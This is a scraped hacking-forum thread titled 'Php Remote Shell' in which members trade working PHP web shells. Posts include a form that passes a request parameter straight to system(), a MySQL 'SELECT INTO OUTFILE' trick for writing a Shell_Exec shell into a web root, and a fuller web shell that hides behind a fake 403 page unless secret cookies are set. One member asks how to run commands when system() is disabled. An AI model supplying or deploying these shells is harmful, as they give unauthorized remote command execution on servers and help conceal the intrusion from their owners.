Government Security
Network Security Resources

Jump to content

Photo

Php Remote Shell

- - - - - security php shell sql mysql
  • Please log in to reply
19 replies to this topic

#16 nuclearsanta

nuclearsanta

    Private First Class

  • Members
  • 38 posts

Posted 04 March 2006 - 10:40 AM

If you use the code:
<?php
$cmd = $_REQUEST['cmd'];
if ($cmd==null){
?>
<form action="<? $_SERVER['self']; ?>" method="post">
<table cellpadding=5 cellspacing=4 border=0>
<tr><td>
Code to input:</td><td>
<input type='text' name='cmd'>
</td></tr>
<tr><td><input type="submit" value="Execute cmd"></td></tr>
</table>
</form>
<?
}else{

system($cmd);
};
?>

thats a "semi-user-friendly" interface for you, or better yet you can google it.

He who has returned


#17 *~eNeRgY~*

*~eNeRgY~*

    Private First Class

  • Members
  • 25 posts

Posted 12 March 2006 - 01:56 PM

If you use the code:

<?php
$cmd = $_REQUEST['cmd'];
if ($cmd==null){
?>
<form action="<? $_SERVER['self']; ?>" method="post">
<table cellpadding=5 cellspacing=4 border=0>
<tr><td>
Code to input:</td><td>
<input type='text' name='cmd'>
</td></tr>
<tr><td><input type="submit" value="Execute cmd"></td></tr>
</table>
</form>
<?
}else{

system($cmd);
};
?>

thats a "semi-user-friendly" interface for you, or better yet you can google it.


Doesn't work!

#18 s134k

s134k

    Sergeant

  • Members
  • 217 posts

Posted 12 March 2006 - 06:05 PM

z0mbie did a PHP RAT a while ago. source is so old it probably needs some updating to perform in newest version of PHP. but it is around, just thought I'd let you know, because I ran into it on one of his sites not too long ago. with some good googling I am sure you could find it.
What I've felt, what I've known, never shined through in what I've shown.

Support feminists, hairy women need love too.

#19 John

John

    Corporal

  • Members
  • 178 posts

Posted 30 July 2006 - 04:18 AM

if system() where disabled would there be any other ways to execute files?

#20 rav3N2K

rav3N2K

    Private

  • Members
  • 2 posts

Posted 11 April 2010 - 05:59 AM

Ok using this code:

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'D:/Inetpub/wwwroot/phpmyadmin/help2.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;





i get this prob:

Notice: Undefined index: -cmd in D:\Inetpub\wwwroot\phpmyadmin\help2.php on line 1


There might be a error in the script
try this to see if it works!

<?php
/* 

// remove all comment's then the script will work 
// also when viewing dir's please make sure to use "double quotes" ex: dir "C:\program files\"
// Make another script on the local machine to set these cookies 
/*
<?php 
setcookie("c1","test");
setcookie("c2","test");
?>
*/
// cookie script above 
/*
$c[0] = "";
$c[1] = "";
if(isset($_COOKIE['c1'])){ $c[0] = $_COOKIE['c1']; }
if(isset($_COOKIE['c2'])){ $c[1] = $_COOKIE['c2']; }
if ( $c[0] == "test" && $c[1] == "test" ) { } 
else {
print "<DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'> <html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'> <head> <title> 403 Forbidden! </title> <meta http-equiv='Content-Type' content='text/html;charset=ISO-8859-1' /> <meta http-equiv='HTTP-403' content='Forbidden!' /> <style type='text/css'> body {font-size:12px;font-weight:normal;font-family:arial;} h1 {font-size:25px;font-family:arial;font-weight:normal;color:red;} h2 {font-size:19px;font-weight:normal;font-family:verdana;color:darkred;} .txt {font-size:11px;font-weight:normal;font-family:verdana;} </style> </head> <body> <h1> Server Error! </h1> <hr width=100% size=1 ></hr> <h2><i>403 Forbidden!</i> </h2> <font class='txt'><b>Description:</b> HTTP 403. The file you request you are Forbidden to ACCESS so the server declined you request because depencies were not satisfied! <br /><br /> <b>Requested Url:</b> /cmd <br /><br /> <hr width=100% size=1 ></hr> <b>Technical Information: SRV* ERR* HX '0x00403' ASCII '403' </b> </font> </body> </html> ";
exit();
 }

?>

<?php 

echo "
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN'
'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
 <style type='text/css'>
 body {font-family:verdana;font-weight:normal;font-size:12px;}
 a:link,a:visited {text-decoration:none;color:black;display:block;width:160px;}
 a:hover,a:active {background-color:white;text-decoration:none;color:black;}
 </style>
<title> Web Shell by: Rav3n2K </head>
<div style='position:absolute;top:85px;left:384px;background-color:#F4F4F4;width:700px;height:250px;'></div>
<div style='position:absolute;left:384px;top:80px;background-color:#3366FF;width:700px;height:17px;'>
<font style='position:absolute;left:20px;top:1px;color:white;font-size:13px'><b>Web Shell </b></font>
</div>
<form method='post' action='cmd.php'>
<textarea name='coutput' style='border:0px solid #a0a0a0;position:absolute;left:396px;top:110px;background-color:#FFFFFF;width:670px;height:150px;font-size:11.49px;font-family:arial;'>
";
?>
<?php
$cmd = "";
$output = "";

 if(isset($_POST['cline']))
 {
 $cmd = $_POST['cline'];
}
if(isset($_POST['coutput']))
{
 $output = $_POST['coutput'];
 }
system($cmd,$output);
 

?>
<?php 
echo "
</textarea>
<div style='width:660px;height:50px;border:1px solid #a0a0a0;position:absolute;top:270px;left:400px;'></div>
<input type='text' onclick=value='' name='cline' value='Type your command here!' style='border:0px solid #a0a0a0;position:absolute;top:280px;left:460px;width:400px;color:#808080;' />
<input type='submit' name='cexec' value='Execute' style='position:absolute;top:277px;left:880px;' />
</form>
</body>
</html>"
*/
?>






Also tagged with one or more of these keywords: security, php, shell, sql, mysql